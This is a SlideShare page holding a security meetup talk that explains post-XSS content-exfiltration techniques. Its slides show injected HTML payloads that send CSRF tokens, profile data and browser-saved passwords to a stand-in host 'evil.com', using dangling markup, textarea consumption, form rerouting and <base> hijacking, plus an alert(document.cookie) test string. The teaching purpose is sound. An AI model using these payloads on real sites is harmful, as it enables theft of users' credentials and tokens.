O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.
Postcards from the post-XSS world-       Content Exfiltration            technique.        By : Piyush Pattanayak         ...
Introduction to XSS•   Type of injection attack, in which malicious scripts are injected into otherwise    benign and trus...
How to test for XSS• XSS should be tested in anything that accepts user input and  displays it in the webpage, after rende...
Introduction to Post XSS• What ?   – Very Similar to the XSS.• Why POST XSS?   – Browser-level efforts to improve the secu...
Content Exfiltration• Goals of a successful XSS attack is the extraction of user-specific secrets  from the vulnerable app...
Several Exfiltration Strategies•   Dangling markup injection•   <textarea>-based consumption•   Rerouting of existing form...
1. Dangling markup injection• Injection of non-terminated markup which will consume a significant  portion of the subseque...
Dangling markup injection cont..      • Limitation : Injection point to appear before the sensitive data        to be extr...
2. <textarea>-based consumption      • Previous method had some limitation like matching quote character.      • Injection...
<textarea>-based consumption cont..      • Limitation : In contrast to the previous method, a degree of user        intera...
3. Rerouting of existing forms      • This works because <form> tag cannot be nested.      • Scenario : If we can inject a...
Rerouting of existing forms cont..      • Interesting when used to target forms automatically        populated with user-s...
4. <base> to hijack relative URLs      • Injection of <base> tags.      • Able to change the semantics of all subsequently...
<base> to hijack relative URLs cont..      • Demo : <base> to hijack relative URLshttp://null.co.in/                      ...
5. Form injection to intercept browser-managed                              passwords      • Browsers have features to rem...
Form injection to intercept browser-managed                       passwords cont..      • We can specify GET instead of PO...
6. Addendum: The limits of exfiltration                           defenses      • All our previous vector redirects to the...
Addendum: The limits of exfiltration defenses cont..      • Example :             – <form action=/post_review.php>        ...
Reference      • http://lcamtuf.coredump.cx/postxss/http://null.co.in/                            http://nullcon.net/
Thank You                       Q&Ahttp://null.co.in/               http://nullcon.net/
Próximos SlideShares
Carregando em…5
×

Postcards from the post xss world- content exfiltration null

4.493 visualizações

Publicada em

Postcards from the post-XSS world- Content Exfiltration technique.

Publicada em: Tecnologia
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Postcards from the post xss world- content exfiltration null

  1. 1. Postcards from the post-XSS world- Content Exfiltration technique. By : Piyush Pattanayak Null Chennai Meet
  2. 2. Introduction to XSS• Type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites.• Occur when an attacker uses a web application to send malicious code generally in the form of a client side script, to a different end user.• Flaws that allow these attacks to succeed are prevalent in most web application that utilize user input and generate output without adequate validation or encoding of user input.• An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to determining that the script should not be trusted, and will execute the script.• Thus giving the malicious script access to cookies, and other sensitive information retained by the browser for use by the site. These scripts can also rewrite the HTML content. Null Chennai Meet
  3. 3. How to test for XSS• XSS should be tested in anything that accepts user input and displays it in the webpage, after rendering it. XSS attacks are successful because most programmers do not apply HTML encoding to the user input, trusting the user input as received.• E.g.: If a user enters “<script>alert (document. Cookie)</script>” in a text filed which upon submission may be rendered as a script tag thus producing a popup alert message with the cookies.• There are plenty of other XSS vectors and information about XSS which you can find out at OWASP. Null Chennai Meet
  4. 4. Introduction to Post XSS• What ? – Very Similar to the XSS.• Why POST XSS? – Browser-level efforts to improve the security of web applications focuses on the containment of attacker-originating scripts. – Content Security Policy, removes the ability to inline JavaScript code in a protected HTML document. – Whitelisting of permissible sources for any externally-loaded scripts. – Related approaches, such as the No Script add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note. Null Chennai Meet
  5. 5. Content Exfiltration• Goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application.• Historically, XSS exploits sought to obtain HTTP (session) cookies.• The introduction of httponly cookies greatly limited this possibility.• In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following: – Personal Data – Tokens used to defend against cross-site request forgery attacks. – Capability-bearing URLs Null Chennai Meet
  6. 6. Several Exfiltration Strategies• Dangling markup injection• <textarea>-based consumption• Rerouting of existing forms• Use of <base> to hijack relative URLs• Form injection to intercept browser-managed passwords• The limits of exfiltration defenses Null Chennai Meet
  7. 7. 1. Dangling markup injection• Injection of non-terminated markup which will consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered.• Opposite quote.• Scenario : If we are allowed to inject anything in the HTML content above the sensitive data which we need to steal.• Example : – <img src=http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name="xsrf_token" value="12345"> ... ← Normally-occurring apostrophe in page text ... </div> http://nullcon.net/
  8. 8. Dangling markup injection cont.. • Limitation : Injection point to appear before the sensitive data to be extracted • If governed by pure chance, this condition will be met in 50% of all cases. • Demo : Dangling Markup Injectionhttp://null.co.in/ http://nullcon.net/
  9. 9. 2. <textarea>-based consumption • Previous method had some limitation like matching quote character. • Injection of a text area. • Scenario: If there is combination of single and quote present before the sensitive data which we want to steal. • Can be injected before or after the legitimate form tag. • Example : – <form action=http://evil.com/log.cgi><textarea> ← Injected line ... <input type="hidden" name="xsrf_token" value=‘12345’> ... (EOF)http://null.co.in/ http://nullcon.net/
  10. 10. <textarea>-based consumption cont.. • Limitation : In contrast to the previous method, a degree of user interaction is needed to exfiltrate the data. • Victim has to submit the form by some means. • Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers. • Demo : <textarea>-based consumptionhttp://null.co.in/ http://nullcon.net/
  11. 11. 3. Rerouting of existing forms • This works because <form> tag cannot be nested. • Scenario : If we can inject any thing on top of a existing form tag. • This allows the attacker to change the action URL to which any existing form will be submitted. • Example : – <form action=http://evil.com/log.cgi> ← Injected line ... <form action=update_profile.php> ← Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form>http://null.co.in/ http://nullcon.net/
  12. 12. Rerouting of existing forms cont.. • Interesting when used to target forms automatically populated with user-specific secrets.  • Demo : Rerouting of existing formshttp://null.co.in/ http://nullcon.net/
  13. 13. 4. <base> to hijack relative URLs • Injection of <base> tags. • Able to change the semantics of all subsequently appearing relative URLs. • Scenario: If we are allowed to insert on the top of the form element. • Example : – <base href=http://evil.com/> ← Injected line ... <form action=update_profile.php> ← Legitimate, pre-existing form <form action=http://evil.com/update_profile.php> ... <input type="text" name="real_name" value="John Q. Public"> ... </form>http://null.co.in/ http://nullcon.net/
  14. 14. <base> to hijack relative URLs cont.. • Demo : <base> to hijack relative URLshttp://null.co.in/ http://nullcon.net/
  15. 15. 5. Form injection to intercept browser-managed passwords • Browsers have features to remember username and password for websites. • Browsers auto fill the fields after matching the domain, id and name parameters of the fields. • We can inject a form into a domain using previous exfiltration techniques, to steal the user credentials. • Example : – <form action="http://www.evil.com" method="POST"> <input type="text" id="username" name="username"> <input type="password" id="password" name="password"> </form>http://null.co.in/ http://nullcon.net/
  16. 16. Form injection to intercept browser-managed passwords cont.. • We can specify GET instead of POST and submit the credentials to a selected same-site destination. • That destination may links to third-party sites (thus leaking the credentials in the Referer header). • Or echo the parameter in the page.http://null.co.in/ http://nullcon.net/
  17. 17. 6. Addendum: The limits of exfiltration defenses • All our previous vector redirects to the attacker domain. • If the developer wishes to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img> to his own domain. • However, any attempts to prevent exfiltration, even in script-less environments, are unlikely to be successful. • Exfiltration attempts do not have to be geared toward relaying the data to a third-party website. • Moving data from private place to public place all within the scope of a single website is also sufficient.http://null.co.in/ http://nullcon.net/
  18. 18. Addendum: The limits of exfiltration defenses cont.. • Example : – <form action=/post_review.php> <input type=hidden name=review_body value=" ← Injected lines ... Your current shipping address: ← Existing page text to be exfiltrated 123 Evergreen Terrace Springfield, USA ... <form action="/update_address.php"> ← Existing form (ignored by the parser) ... <input type="hidden" name="xsrf_token" value="12345"> ← Token valid for /update_address.php and /post_review.php ... </form> • Demo : Addendum: The limits of exfiltration defenseshttp://null.co.in/ http://nullcon.net/
  19. 19. Reference • http://lcamtuf.coredump.cx/postxss/http://null.co.in/ http://nullcon.net/
  20. 20. Thank You Q&Ahttp://null.co.in/ http://nullcon.net/

×